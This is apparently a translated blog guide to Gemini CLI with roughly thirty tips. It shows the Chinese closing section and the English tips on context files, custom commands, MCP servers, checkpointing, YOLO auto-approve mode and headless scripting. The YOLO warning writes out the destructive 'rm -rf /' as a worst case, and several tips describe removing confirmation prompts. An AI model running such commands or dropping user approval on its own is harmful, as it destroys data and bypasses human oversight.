最后，这不是一个提高生产力的技巧，但确实是一个有趣的彩蛋——在 Gemini CLI 中尝试 */corgi* 命令。这会切换到“柯基模式”，让可爱的柯基动画在你的终端中奔跑！它虽然不能帮助你更好地编码，但肯定能在漫长的编码会话中轻松一下心情。你会看到一个 ASCII 艺术的柯基在 CLI 界面中飞奔。要关闭它，再次运行 /corgi 即可。

这是团队添加的纯娱乐功能（是的，甚至有关于在柯基模式上花费开发时间的调侃讨论）。这表明开发者在工具中隐藏了一些奇思妙想。所以当你需要快速休息一下或想开心一下时，试试 /corgi 吧。🐕🎉

（传闻说可能还有其他彩蛋或模式——谁知道呢？也许是”/partyparrot”之类的。备忘单或帮助命令列出了 /corgi，所以这不是秘密，只是很少被使用。现在你也在这个笑话之中了！）

总结：

我们已经全面介绍了 Gemini CLI 的专业技巧和功能。从使用 GEMINI.md 设置持久上下文，到编写自定义命令和使用 MCP 服务器等高级工具，再到利用多模态输入和自动化工作流，这个 AI 命令行助手能做的事情非常多。作为外部开发者，你可以将 Gemini CLI 整合到日常工作中——它就像你终端中的强大盟友，能够处理繁琐任务、提供见解，甚至排查环境问题。

Gemini CLI 正在快速发展（作为开源项目，有社区贡献），新功能和改进不断涌现。通过掌握本指南中的专业技巧，你将能够充分利用这个工具的全部潜力。这不仅仅是使用 AI 模型——而是将 AI 深度整合到你的软件开发和管理方式中。

祝你在使用 Gemini CLI 时编码愉快，探索一下你的”终端中的 AI 代理”能带你走多远。

现在你手中拥有了 AI 瑞士军刀——明智地使用它，它将让你成为更高效（或许也更快乐）的开发者！

原文

本文由英文版项目翻译而来,原文地址github,gemini-cli-tips
本文仓库,https://github.com/yiGmMk/gemini-cli-tips

AI|Gemini CLI Tips & Tricks

2025-12-15T16:00:00.000Z

This guide covers ~30 pro-tips for effectively using Gemini CLI for agentic coding

Gemini CLI is an open-source AI assistant that brings the power of Google’s Gemini model directly into your terminal. It functions as a conversational, “agentic” command-line tool - meaning it can reason about your requests, choose tools (like running shell commands or editing files), and execute multi-step plans to help with your development workflow.

In practical terms, Gemini CLI acts like a supercharged pair programmer and command-line assistant. It excels at coding tasks, debugging, content generation, and even system automation, all through natural language prompts. Before diving into pro tips, let’s quickly recap how to set up Gemini CLI and get it running.

Getting Started

Installation: You can install Gemini CLI via npm. For a global install, use:

1	npm install -g @google/gemini-cli

Or run it without installing using npx:

1	npx @google/gemini-cli

Gemini CLI is available on all major platforms (it’s built with Node.js/TypeScript). Once installed, simply run the gemini command in your terminal to launch the interactive CLI.

Authentication: On first use, you’ll need to authenticate with the Gemini service. You have two options: (1) Google Account Login (free tier) - this lets you use Gemini 2.5 Pro for free with generous usage limits (about 60 requests/minute and 1,000 requests per day. On launch, Gemini CLI will prompt you to sign in with a Google account (no billing required. (2) API Key (paid or higher-tier access) - you can get an API key from Google AI Studio and set the environment variable GEMINI_API_KEY to use it.

API key usage can offer higher quotas and enterprise data‑use protections; prompts aren’t used for training on paid/billed usage, though logs may be retained for safety.

For example, add to your shell profile:

1	export GEMINI_API_KEY="YOUR_KEY_HERE"

Basic Usage: To start an interactive session, just run gemini with no arguments. You’ll get a gemini> prompt where you can type requests or commands. For instance:

1 2	$ gemini gemini> Create a React recipe management app using SQLite

You can then watch as Gemini CLI creates files, installs dependencies, runs tests, etc., to fulfill your request. If you prefer a one-shot invocation (non-interactive), use the -p flag with a prompt, for example:

1	gemini -p "Summarize the main points of the attached file. @./report.txt"

This will output a single response and exit. You can also pipe input into Gemini CLI: for example, echo "Count to 10" | gemini will feed the prompt via stdin.

CLI Interface: Gemini CLI provides a rich REPL-like interface. It supports slash commands (special commands prefixed with / for controlling the session, tools, and settings) and bang commands (prefixed with ! to execute shell commands directly). We’ll cover many of these in the pro tips below. By default, Gemini CLI operates in a safe mode where any action that modifies your system (writing files, running shell commands, etc.) will ask for confirmation. When a tool action is proposed, you’ll see a diff or command and be prompted (Y/n) to approve or reject it. This ensures the AI doesn’t make unwanted changes without your consent.

With the basics out of the way, let’s explore a series of pro tips and hidden features to help you get the most out of Gemini CLI. Each tip is presented with a simple example first, followed by deeper details and nuances. These tips incorporate advice and insights from the tool’s creators (e.g. Taylor Mullen) and the Google Developer Relations team, as well as the broader community, to serve as a canonical guide for power users of Gemini CLI.

Tip 1: Use `GEMINI.md` for Persistent Context

Quick use-case: Stop repeating yourself in prompts. Provide project-specific context or instructions by creating a GEMINI.md file, so the AI always has important background knowledge without being told every time.

When working on a project, you often have certain overarching details - e.g. coding style guidelines, project architecture, or important facts - that you want the AI to keep in mind. Gemini CLI allows you to encode these in one or more GEMINI.md files. Simply create a .gemini folder (if not already present) in your project, and add a Markdown file named GEMINI.md with whatever notes or instructions you want the AI to persist. For example:

# Project Phoenix - AI Assistant

- All Python code must follow PEP 8 style.  
- Use 4 spaces for indentation.  
- The user is building a data pipeline; prefer functional programming paradigms.

Place this file in your project root (or in subdirectories for more granular context). Now, whenever you run gemini in that project, it will automatically load these instructions into context. This means the model will always be primed with them, avoiding the need to prepend the same guidance to every prompt.

How it works: Gemini CLI uses a hierarchical context loading system. It will combine global context (from ~/.gemini/GEMINI.md, which you can use for cross-project defaults) with your project-specific GEMINI.md, and even context files in subfolders. More specific files override more general ones. You can inspect what context was loaded at any time by using the command:

1	/memory show

This will display the full combined context the AI sees. If you make changes to your GEMINI.md, use /memory refresh to reload the context without restarting the session.

Pro Tip: Use the /init slash command to quickly generate a starter GEMINI.md. Running /init in a new project creates a template context file with information like the tech stack detected, a summary of the project, etc.. You can then edit and expand that file. For large projects, consider breaking the context into multiple files and importing them into GEMINI.md with @include syntax. For example, your main GEMINI.md could have lines like @./docs/prompt-guidelines.md to pull in additional context files. This keeps your instructions organized.

With a well-crafted GEMINI.md, you essentially give Gemini CLI a “memory” of the project’s requirements and conventions. This persistent context leads to more relevant responses and less back-and-forth prompt engineering.

Tip 2: Create Custom Slash Commands

Quick use-case: Speed up repetitive tasks by defining your own slash commands. For example, you could make a command /test:gen that generates unit tests from a description, or /db:reset that drops and recreates a test database. This extends Gemini CLI’s functionality with one-liners tailored to your workflow.

Gemini CLI supports custom slash commands that you can define in simple configuration files. Under the hood, these are essentially pre-defined prompt templates. To create one, make a directory commands/ under either ~/.gemini/ for global commands or in your project’s .gemini/ folder for project-specific commands. Inside commands/, create a TOML file for each new command. The file name format determines the command name: e.g. a file test/gen.toml defines a command /test:gen.

Let’s walk through an example. Say you want a command to generate a unit test from a requirement description. You could create ~/.gemini/commands/test/gen.toml with the following content:

# Invoked as: /test:gen "Description of the test"  
description \= "Generates a unit test based on a requirement."  
prompt \= """  
You are an expert test engineer. Based on the following requirement, please write a comprehensive unit test using the Jest framework.

Requirement: {{args}}  
"""

Now, after reloading or restarting Gemini CLI, you can simply type:

1	/test:gen "Ensure the login button redirects to the dashboard upon success"

Gemini CLI will recognize /test:gen and substitute the {{args}} in your prompt template with the provided argument (in this case, the requirement). The AI will then proceed to generate a Jest unit test accordingly. The description field is optional but is used when you run /help or /tools to list available commands.

This mechanism is extremely powerful - effectively, you can script the AI with natural language. The community has created numerous useful custom commands. For instance, Google’s DevRel team shared a set of 10 practical workflow commands (via an open-source repo) demonstrating how you can script common flows like creating API docs, cleaning data, or setting up boilerplate code. By defining a custom command, you package a complex prompt (or series of prompts) into a reusable shortcut.

Pro Tip: Custom commands can also be used to enforce formatting or apply a “persona” to the AI for certain tasks. For example, you might have a /review:security command that always prefaces the prompt with “You are a security auditor…” to review code for vulnerabilities. This approach ensures consistency in how the AI responds to specific categories of tasks.

To share commands with your team, you can commit the TOML files in your project’s repo (under .gemini/commands directory). Team members who have Gemini CLI will automatically pick up those commands when working in the project. This is a great way to standardize AI-assisted workflows across a team.

Tip 3: Extend Gemini with Your Own `MCP` Servers

Quick use-case: Suppose you want Gemini to interface with an external system or a custom tool that isn’t built-in - for example, query a proprietary database, or integrate with Figma designs. You can do this by running a custom Model Context Protocol (MCP) server and plugging it into Gemini CLI. MCP servers let you add new tools and abilities to Gemini, effectively extending the agent.

Gemini CLI comes with several MCP servers out-of-the-box (for instance, ones enabling Google Search, code execution sandboxes, etc.), and you can add your own. An MCP server is essentially an external process (it could be a local script, a microservice, or even a cloud endpoint) that speaks a simple protocol to handle tasks for Gemini. This architecture is what makes Gemini CLI so extensible.

Examples of MCP servers: Some community and Google-provided MCP integrations include a Figma MCP (to fetch design details from Figma), a Clipboard MCP (to read/write from your system clipboard), and others. In fact, in an internal demo, the Gemini CLI team showcased a “Google Docs MCP” server that allowed saving content directly to Google Docs. The idea is that whenever Gemini needs to perform an action that the built-in tools can’t handle, it can delegate to your MCP server.

How to add one: You can configure MCP servers via your settings.json or using the CLI. For a quick setup, try the CLI command:

1	gemini mcp add myserver --command "python3 my_mcp_server.py" --port 8080

This would register a server named “myserver” that Gemini CLI will launch by running the given command (here a Python module) on port 8080. In ~/.gemini/settings.json, it would add an entry under mcpServers. For example:

"mcpServers": {
  "myserver": {
    "command": "python3",
    "args": ["-m", "my_mcp_server", "--port", "8080"],
    "cwd": "./mcp_tools/python",
    "timeout": 15000
  }
}

This configuration (based on the official docs) tells Gemini how to start the MCP server and where. Once running, the tools provided by that server become available to Gemini CLI. You can list all MCP servers and their tools with the slash command:

/mcp

This will show any registered servers and what tool names they expose.

Power of MCP: MCP servers can provide rich, multi-modal results. For instance, a tool served via MCP could return an image or a formatted table as part of the response to Gemini CLI. They also support OAuth 2.0, so you can securely connect to APIs (like Google’s APIs, GitHub, etc.) via an MCP tool without exposing credentials. Essentially, if you can code it, you can wrap it as an MCP tool - turning Gemini CLI into a hub that orchestrates many services.

Default vs. custom: By default, Gemini CLI’s built-in tools cover a lot (reading files, web search, executing shell commands, etc.), but MCP lets you go beyond. Some advanced users have created MCP servers to interface with internal systems or to perform specialized data processing. For example, you could have a database-mcp that provides a /query_db tool for running SQL queries on a company database, or a jira-mcp to create tickets via natural language.

When creating your own, be mindful of security: by default, custom MCP tools require confirmation unless you mark them as trusted. You can control safety with settings like trust: true for a server (which auto-approves its tool actions) or by whitelisting specific safe tools and blacklisting dangerous ones.

In short, MCP servers unlock limitless integration. They’re a pro feature that lets Gemini CLI become a glue between your AI assistant and whatever system you need it to work with. If you’re interested in building one, check out the official MCP guide and community examples.

Tip 4: Leverage Memory Addition & Recall

Quick use-case: Keep important facts at your AI’s fingertips by adding them to its long-term memory. For example, after figuring out a database port or an API token, you can do:

1	/memory add "Our staging RabbitMQ is on port 5673"

This will store that fact so you (or the AI) don’t forget it later. You can then recall everything in memory with /memory show at any time.

The /memory commands provide a simple but powerful mechanism for persistent memory. When you use /memory add , the given text is appended to your project’s global context (technically, it’s saved into the global ~/.gemini/GEMINI.md file or the project’s GEMINI.md. It’s a bit like taking a note and pinning it to the AI’s virtual bulletin board. Once added, the AI will always see that note in the prompt context for future interactions, across sessions.

Consider an example: you’re debugging an issue and discover a non-obvious insight (“The config flag X_ENABLE must be set to true or the service fails to start”). If you add this to memory, later on if you or the AI are discussing a related problem, it won’t overlook this critical detail - it’s in the context.

Using /memory:

/memory add "" - Add a fact or note to memory (persistent context). This updates the GEMINI.md immediately with the new entry.
/memory show - Display the full content of the memory (i.e. the combined context file that’s currently loaded).
/memory refresh - Reload the context from disk (useful if you manually edited the GEMINI.md file outside of Gemini CLI, or if multiple people are collaborating on it).

Because the memory is stored in Markdown, you can also manually edit the GEMINI.md file to curate or organize the info. The /memory commands are there for convenience during conversation, so you don’t have to open an editor.

Pro Tip: This feature is great for “decision logs.” If you decide on an approach or rule during a chat (e.g., a certain library to use, or an agreed code style), add it to memory. The AI will then recall that decision and avoid contradicting it later. It’s especially useful in long sessions that might span hours or days - by saving key points, you mitigate the model’s tendency to forget earlier context when the conversation gets long.

Another use is personal notes. Because ~/.gemini/GEMINI.md (global memory) is loaded for all sessions, you could put general preferences or information there. For example, “The user’s name is Alice. Speak politely and avoid slang.” It’s like configuring the AI’s persona or global knowledge. Just be aware that global memory applies to all projects, so don’t clutter it with project-specific info.

In summary, Memory Addition & Recall helps Gemini CLI maintain state. Think of it as a knowledge base that grows with your project. Use it to avoid repeating yourself or to remind the AI of facts it would otherwise have to rediscover from scratch.

Tip 5: Use Checkpointing and `/restore` as an Undo Button

Quick use-case: If Gemini CLI makes a series of changes to your files that you’re not happy with, you can instantly roll back to a prior state. Enable checkpointing when you start Gemini (or in settings), and use the /restore command to undo changes like a lightweight Git revert. /restore rolls back your workspace to the saved checkpoint; conversation state may be affected depending on how the checkpoint was captured.

Gemini CLI’s checkpointing feature acts as a safety net. When enabled, the CLI takes a snapshot of your project’s files before each tool execution that modifies files. If something goes wrong, you can revert to the last known good state. It’s essentially version control for the AI’s actions, without you needing to manually commit to Git each time.

How to use it: You can turn on checkpointing by launching the CLI with the --checkpointing flag:

1	gemini --checkpointing

Alternatively, you can make it the default by adding to your config ("checkpointing": { "enabled": true } in settings.json). Once active, you’ll notice that each time Gemini is about to write to a file, it says something like “Checkpoint saved.”

If you then realize an AI-made edit is problematic, you have two options:

Run /restore list (or just /restore with no arguments) to see a list of recent checkpoints with timestamps and descriptions.
Run /restore to rollback to a specific checkpoint. If you omit the id and there’s only one pending checkpoint, it will restore that by default.

For example:

/restore

Gemini CLI might output:

0: [2025-09-22 10:30:15] Before running ‘apply_patch’
1: [2025-09-22 10:45:02] Before running ‘write_file’

You can then do /restore 0 to revert all file changes (and even the conversation context) back to how it was at that checkpoint. In this way, you can “undo” a mistaken code refactor or any other changes Gemini made.

What gets restored: The checkpoint captures the state of your working directory (all files that Gemini CLI is allowed to modify) and the workspace files (conversation state may also be rolled back depending on how the checkpoint was captured). When you restore, it overwrites files to the old version and resets the conversation memory to that snapshot. It’s like time-traveling the AI agent back to before it made the wrong turn. Note that it won’t undo external side effects (for example, if the AI ran a database migration, it can’t undo that), but anything in the file system and chat context is fair game.

Best practices: It’s a good idea to keep checkpointing on for non-trivial tasks. The overhead is small, and it provides peace of mind. If you find you don’t need a checkpoint (everything went well), you can always clear it or just let the next one overwrite it. The development team recommends using checkpointing especially before multi-step code edits. For mission-critical projects, though, you should still use a proper version control (git) as your primary safety net - consider checkpoints as a convenience for quick undo rather than a full VCS.

In essence, /restore lets you use Gemini CLI with confidence. You can let the AI attempt bold changes, knowing you have an *”OH NO” button* to rewind if needed.

Tip 6: Read Google Docs, Sheets, and More. With a Workspace MCP server configured, you can paste a Docs/Sheets link and have the MCP fetch it, subject to permissions

Quick use-case: Imagine you have a Google Doc or Sheet with some specs or data that you want the AI to use. Instead of copy-pasting the content, you can provide the link, and with a configured Workspace MCP server Gemini CLI can fetch and read it.

For example:

1	Summarize the requirements from this design doc: https://docs.google.com/document/d/<id>

Gemini can pull in the content of that Doc and incorporate it into its response. Similarly, it can read Google Sheets or Drive files by link.

How this works: These capabilities are typically enabled via MCP integrations. Google’s Gemini CLI team has built (or is working on) connectors for Google Workspace. One approach is running a small MCP server that uses Google’s APIs (Docs API, Sheets API, etc.) to retrieve document content when given a URL or ID. When configured, you might have slash commands or tools like /read_google_doc or simply an auto-detection that sees a Google Docs link and invokes the appropriate tool to fetch it.

For example, in an Agent Factory podcast demo, the team used a Google Docs MCP to save a summary directly to a doc - which implies they could also read the doc’s content in the first place. In practice, you might do something like:

1	@https://docs.google.com/document/d/XYZ12345

Including a URL with @ (the context reference syntax) signals Gemini CLI to fetch that resource. With a Google Doc integration in place, the content of that document would be pulled in as if it were a local file. From there, the AI can summarize it, answer questions about it, or otherwise use it in the conversation.

Similarly, if you paste a Google Drive file link, a properly configured Drive tool could download or open that file (assuming permissions and API access are set up). Google Sheets could be made available via an MCP that runs queries or reads cell ranges, enabling you to ask things like “What’s the sum of the budget column in this Sheet [link]?” and have the AI calculate it.

Setting it up: As of this writing, the Google Workspace integrations may require some tinkering (obtaining API credentials, running an MCP server such as the one described by Kanshi Tanaike, etc.). Keep an eye on the official Gemini CLI repository and community forums for ready-to-use extensions - for example, an official Google Docs MCP might become available as a plugin/extension. If you’re eager, you can write one following guides on how to use Google APIs within an MCP server. It typically involves handling OAuth (which Gemini CLI supports for MCP servers) and then exposing tools like read_google_doc.

Usage tip: When you have these tools, using them can be as simple as providing the link in your prompt (the AI might automatically invoke the tool to fetch it) or using a slash command like /doc open . Check /tools to see what commands are available - Gemini CLI lists all tools and custom commands there.

In summary, Gemini CLI can reach out beyond your local filesystem. Whether it’s Google Docs, Sheets, Drive, or other external content, you can pull data in by reference. This pro tip saves you from manual copy-paste and keeps the context flow natural - just refer to the document or dataset you need, and let the AI grab what’s needed. It makes Gemini CLI a true knowledge assistant for all the information you have access to, not just the files on your disk.

(Note: Accessing private documents of course requires the CLI to have the appropriate permissions. Always ensure any integration respects security and privacy. In corporate settings, setting up such integrations might involve additional auth steps.)

Tip 7: Reference Files and Images with `@` for Explicit Context

Quick use-case: Instead of describing a file’s content or an image verbally, just point Gemini CLI directly to it. Using the @ syntax, you can attach files, directories, or images into your prompt. This guarantees the AI sees exactly what’s in those files as context. For example:

1	Explain this code to me: @./src/main.js

This will include the contents of src/main.js in the prompt (up to Gemini’s context size limits), so the AI can read it and explain it.

This @ file reference is one of Gemini CLI’s most powerful features for developers. It eliminates ambiguity - you’re not asking the model to rely on memory or guesswork about the file, you’re literally handing it the file to read. You can use this for source code, text documents, logs, etc. Similarly, you can reference entire directories:

1	Refactor the code in @./utils/ to use async/await.

By appending a path that ends in a slash, Gemini CLI will recursively include files from that directory (within reason, respecting ignore files and size limits). This is great for multi-file refactors or analyses, as the AI can consider all relevant modules together.

Even more impressively, you can reference binary files like images in prompts. Gemini CLI (using the Gemini model’s multimodal capabilities) can understand images. For example:

1	Describe what you see in this screenshot: @./design/mockup.png

The image will be fed into the model, and the AI might respond with something like “This is a login page with a blue sign-in button and a header image,” etc.. You can imagine the uses: reviewing UI mockups, organizing photos (as we’ll see in a later tip), or extracting text from images (Gemini can do OCR as well).

A few notes on using @ references effectively:

File limits: Gemini 2.5 Pro has a huge context window (up to 1 million tokens), so you can include quite large files or many files. However, extremely large files might be truncated. If a file is enormous (say, hundreds of thousands of lines), consider summarizing it or breaking it into parts. Gemini CLI will warn you if a reference is too large or if it skipped something due to size.
Automatic ignoring: By default, Gemini CLI respects your .gitignore and .geminiignore files when pulling in directory context. So if you @./ a project root, it will not dump huge ignored folders (like node_modules) into the prompt. You can customize ignore patterns with .geminiignore similarly to how .gitignore works.
Explicit vs implicit context: Taylor Mullen (the creator of Gemini CLI) emphasizes using @ for explicit context injection rather than relying on the model’s memory or summarizing things yourself. It’s more precise and ensures the AI isn’t hallucinating content. Whenever possible, point the AI to the source of truth (code, config files, documentation) with @ references. This practice can significantly improve accuracy.
Chaining references: You can include multiple files in one prompt, like:

1	Compare @./foo.py and @./bar.py and tell me differences.

The CLI will include both files. Just be mindful of token limits; multiple large files might consume a lot of the context window.

Using @ is essentially how you feed knowledge into Gemini CLI on the fly. It turns the CLI into a multi-modal reader that can handle text and images. As a pro user, get into the habit of leveraging this - it’s often faster and more reliable than asking the AI something like “Open the file X and do Y” (which it may or may not do on its own). Instead, you explicitly give it X to work with.

Tip 8: On-the-Fly Tool Creation (Have Gemini Build Helpers)

Quick use-case: If a task at hand would benefit from a small script or utility, you can ask Gemini CLI to create that tool for you - right within your session. For example, you might say, “Write a Python script to parse all JSON files in this folder and extract the error fields.” Gemini can generate the script, which you can then execute via the CLI. In essence, you can dynamically extend the toolset as you go.

Gemini CLI is not limited to its pre-existing tools; it can use its coding abilities to fabricate new ones when needed. This often happens implicitly: if you ask for something complex, the AI might propose writing a temporary file (with code) and then running it. As a user, you can also guide this process explicitly:

Creating scripts: You can prompt Gemini to create a script or program in the language of your choice. It will likely use the write_file tool to create the file. For instance:

1	Generate a Node.js script that reads all '.log' files in the current directory and reports the number of lines in each.

Gemini CLI will draft the code, and with your approval, write it to a file (e.g. script.js). You can then run it by either using the ! shell command (e.g. !node script.js) or by asking Gemini CLI to execute it (the AI might automatically use run_shell_command to execute the script it just wrote, if it deems it part of the plan).

Temporary tools via MCP: In advanced scenarios, the AI might even suggest launching an MCP server for some specialized tasks. For example, if your prompt involves some heavy text processing that might be better done in Python, Gemini could generate a simple MCP server in Python and run it. While this is more rare, it demonstrates that the AI can set up a new “agent” on the fly. (One of the slides from the Gemini CLI team humorously referred to “MCP servers for everything, even one called LROwn” - suggesting you can have Gemini run an instance of itself or another model, though that’s more of a trick than a practical use!).

The key benefit here is automation. Instead of you manually stopping to write a helper script, you can let the AI do it as part of the flow. It’s like having an assistant who can create tools on-demand. This is especially useful for data transformation tasks, batch operations, or one-off computations that the built-in tools don’t directly provide.

Nuances and safety: When Gemini CLI writes code for a new tool, you should still review it before running. The /diff view (Gemini will show you the file diff before you approve writing it) is your chance to inspect the code. Ensure it does what you expect and nothing malicious or destructive (the AI shouldn’t produce something harmful unless your prompt explicitly asks, but just like any code from an AI, double-check logic, especially for scripts that delete or modify lots of data).

Example scenario: Let’s say you have a CSV file and you want to filter it in a complex way. You ask Gemini CLI to do it, and it might say: “I will write a Python script to parse the CSV and apply the filter.” It then creates filter_data.py. After you approve and it runs, you get your result, and you might never need that script again. This ephemeral creation of tools is a pro move - it shows the AI effectively extending its capabilities autonomously.

Pro Tip: If you find the script useful beyond the immediate context, you can promote it into a permanent tool or command. For instance, if the AI generated a great log-processing script, you might later turn it into a custom slash command (Tip #2) for easy reuse. The combination of Gemini’s generative power and the extension hooks means your toolkit can continuously evolve as you use the CLI.

In summary, don’t restrict Gemini to what it comes with. Treat it as a junior developer who can whip up new programs or even mini-servers to help solve the problem. This approach embodies the agentic philosophy of Gemini CLI - it will figure out what tools it needs, even if it has to code them on the spot.

Tip 9: Use Gemini CLI for System Troubleshooting & Configuration

Quick use-case: You can run Gemini CLI outside of a code project to help with general system tasks - think of it as an intelligent assistant for your OS. For example, if your shell is misbehaving, you could open Gemini in your home directory and ask: “Fix my .bashrc file, it has an error.” Gemini can then open and edit your config file for you.

This tip highlights that Gemini CLI isn’t just for coding projects - it’s your AI helper for your whole development environment. Many users have used Gemini to customize their dev setup or fix issues on their machine:

Editing dotfiles: You can load your shell configuration (.bashrc or .zshrc) by referencing it (@~/.bashrc) and then ask Gemini CLI to optimize or troubleshoot it. For instance, “My PATH isn’t picking up Go binaries, can you edit my .bashrc to fix that?” The AI can insert the correct export line. It will show you the diff for confirmation before saving changes.
Diagnosing errors: If you encounter a cryptic error in your terminal or an application log, you can copy it and feed it to Gemini CLI. It will analyze the error message and often suggest steps to resolve it. This is similar to how one might use StackOverflow or Google, but with the AI directly examining your scenario. For example: “When I run npm install, I get an EACCES permission error - how do I fix this?” Gemini might detect it’s a permissions issue in node_modules and guide you to change directory ownership or use a proper node version manager.
Running outside a project: By default, if you run gemini in a directory without a .gemini context, it just means no project-specific context is loaded - but you can still use the CLI fully. This is great for ad-hoc tasks like system troubleshooting. You might not have any code files for it to consider, but you can still run shell commands through it or let it fetch web info. Essentially, you’re treating Gemini CLI as an AI-powered terminal that can do things for you, not just chat.
Workstation customization: Want to change a setting or install a new tool? You can ask Gemini CLI, “Install Docker on my system” or “Configure my Git to sign commits with GPG.” The CLI will attempt to execute the steps. It might fetch instructions from the web (using the search tool) and then run the appropriate shell commands. Of course, always watch what it’s doing and approve the commands - but it can save time by automating multi-step setup processes. One real example: a user asked Gemini CLI to “set my macOS Dock preferences to auto-hide and remove the delay,” and the AI was able to execute the necessary defaults write commands.

Think of this mode as using Gemini CLI as a smart shell. In fact, you can combine this with Tip 16 (shell passthrough mode) - sometimes you might drop into ! shell mode to verify something, then go back to AI mode to have it analyze output.

Caveat: When doing system-level tasks, be cautious with commands that have widespread impact (like rm -rf or system config changes). Gemini CLI will usually ask for confirmation, and it doesn’t run anything without you seeing it. But as a power user, you should have a sense of what changes are being made. If unsure, ask Gemini to explain a command before running (e.g., “Explain what defaults write com.apple.dock autohide-delay -float 0 does” - it will gladly explain rather than just execute if you prompt it in that way).

Troubleshooting bonus: Another neat use is using Gemini CLI to parse logs or config files looking for issues. For instance, “Scan this Apache config for mistakes” (with @httpd.conf), or “Look through syslog for errors around 2 PM yesterday” (with an @/var/log/syslog if accessible). It’s like having a co-administrator. It can even suggest likely causes for crashes or propose fixes for common error patterns.

In summary, don’t hesitate to fire up Gemini CLI as your assistant for environment issues. It’s there to accelerate all your workflows - not just writing code, but maintaining the system that you write code on. Many users report that customizing their dev environment with Gemini’s help feels like having a tech buddy always on call to handle the tedious or complex setup steps.

Tip 10: YOLO Mode - Auto-Approve Tool Actions (Use with Caution)

Quick use-case: If you’re feeling confident (or adventurous), you can let Gemini CLI run tool actions without asking for your confirmation each time. This is YOLO mode (You Only Live Once). It’s enabled by the --yolo flag or by pressing Ctrl+Y during a session. In YOLO mode, as soon as the AI decides on a tool (like running a shell command or writing to a file), it executes it immediately, without that “Approve? (y/n)” prompt.

Why use YOLO mode? Primarily for speed and convenience when you trust the AI’s actions. Experienced users might toggle YOLO on if they’re doing a lot of repetitive safe operations. For example, if you ask Gemini to generate 10 different files one after another, approving each can slow down the flow; YOLO mode would just let them all be written automatically. Another scenario is using Gemini CLI in a completely automated script or CI pipeline - you might run it headless with --yolo so it doesn’t pause for confirmation.

To start in YOLO mode from the get-go, launch the CLI with:

1	gemini --yolo

Or the short form gemini -y. You’ll see some indication in the CLI (like a different prompt or a notice) that auto-approve is on. During an interactive session, you can toggle it by pressing Ctrl+Y at any time - the CLI will usually display a message like “YOLO mode enabled (all actions auto-approved)” in the footer.

Big warning: YOLO mode is powerful but risky. The Gemini team themselves labels it for “daring users” - meaning you should be aware that the AI could potentially execute a dangerous command without asking. In normal mode, if the AI decided to run rm -rf / (worst-case scenario), you’d obviously decline. In YOLO mode, that command would run immediately (and likely ruin your day). While such extreme mistakes are unlikely (the AI’s system prompt includes safety guidelines), the whole point of confirmations is to catch any unwanted action. YOLO removes that safety net.

Best practices for YOLO: If you want some of the convenience without full risk, consider allow-listing specific commands. For example, you can configure in settings that certain tools or command patterns don’t require confirmation (like allowing all git commands, or read-only actions). In fact, Gemini CLI supports a config for skipping confirmation on specific commands: e.g., you can set something like "tools.shell.autoApprove": ["git ", "npm test"] to always run those. This way, you might not need YOLO mode globally - you selectively YOLO only safe commands. Another approach: run Gemini in a sandbox or container when using YOLO, so even if it does something wild, your system is insulated (Gemini has a --sandbox flag to run tools in a Docker container).

Many advanced users toggle YOLO on and off frequently - turning it on when doing a string of minor file edits or queries, and off when about to do something critical. You can do the same, using the keyboard shortcut as a quick toggle.

In summary, YOLO mode eliminates friction at the cost of oversight. It’s a pro feature to use sparingly and wisely. It truly demonstrates trust in the AI (or recklessness!). If you’re new to Gemini CLI, you should probably avoid YOLO until you clearly understand the patterns of what it tends to do. If you do use it, double down on having version control or backups - just in case.

(If it’s any consolation, you’re not alone - many in the community joke about “I YOLO’ed and Gemini did something crazy.” So use it, but… well, you only live once.)

Tip 11: Headless & Scripting Mode (Run Gemini CLI in the Background)

Quick use-case: You can use Gemini CLI in scripts or automation by running it in headless mode. This means you provide a prompt (or even a full conversation) via command-line arguments or environment variables, and Gemini CLI produces an output and exits. It’s great for integrating with other tools or triggering AI tasks on a schedule.

For instance, to get a one-off answer without opening the REPL, you’ve seen you can use gemini -p "...prompt...". This is already headless usage: it prints the model’s response and returns to the shell. But there’s more you can do:

System prompt override: If you want to run Gemini CLI with a custom system persona or instruction set (different from the default), you can use the environment variable GEMINI_SYSTEM_MD. By setting this, you tell Gemini CLI to ignore its built-in system prompt and use your provided file instead. For example:

1 2	export GEMINI_SYSTEM_MD="/path/to/custom_system.md" gemini -p "Perform task X with high caution"

This would load your custom_system.md as the system prompt (the “role” and rules the AI follows) before executing the prompt. Alternatively, if you set GEMINI_SYSTEM_MD=true, the CLI will look for a file named system.md in the current project’s .gemini directory. This feature is very advanced - it essentially allows you to replace the built-in brain of the CLI with your own instructions, which some users do for specialized workflows (like simulating a specific persona or enforcing ultra-strict policies). Use it carefully, as replacing the core prompt can affect tool usage (the core prompt contains important directions for how the AI selects and uses tools).

Direct prompt via CLI: Aside from -p, there’s also -i (interactive prompt) which starts a session with an initial prompt, and then keeps it open. For example: gemini -i "Hello, let's debug something" will open the REPL and already have said hello to the model. This is useful if you want the first question to be asked immediately when starting.
Scripting with shell pipes: You can pipe not just text but also files or command outputs into Gemini. For example: gemini -p "Summarize this log:" < big_log.txt will feed the content of big_log.txt into the prompt (after the phrase “Summarize this log:”). Or you might do some_command | gemini -p "Given the above output, what went wrong?". This technique allows you to compose Unix tools with AI analysis. It’s headless in the sense that it’s a single-pass operation.
Running in CI/CD: You could incorporate Gemini CLI into build processes. For instance, a CI pipeline might run a test and then use Gemini CLI to automatically analyze failing test output and post a comment. Using the -p flag and environment auth, this can be scripted. (Of course, ensure the environment has the API key or auth needed.)

One more headless trick: the --format=json flag (or config setting). Gemini CLI can output responses in JSON format instead of the human-readable text if you configure it. This is useful for programmatic consumption - your script can parse the JSON to get the answer or any tool actions details.

Why headless mode matters: It transforms Gemini CLI from an interactive assistant into a backend service or utility that other programs can call. You could schedule a cronjob that runs a Gemini CLI prompt nightly (imagine generating a report or cleaning up something with AI logic). You could wire up a button in an IDE that triggers a headless Gemini run for a specific task.

Example: Let’s say you want a daily summary of a news website. You could have a script:

1	gemini -p "Web-fetch \"https://news.site/top-stories\" and extract the headlines, then write them to headlines.txt"

With --yolo perhaps, so it won’t ask confirmation to write the file. This would use the web fetch tool to get the page and the file write tool to save the headlines. All automatically, no human in the loop. The possibilities are endless once you treat Gemini CLI as a scriptable component.

In summary, Headless Mode enables automation. It’s the bridge between Gemini CLI and other systems. Mastering it means you can scale up your AI usage - not just when you’re typing in the terminal, but even when you aren’t around, your AI agent can do work for you.

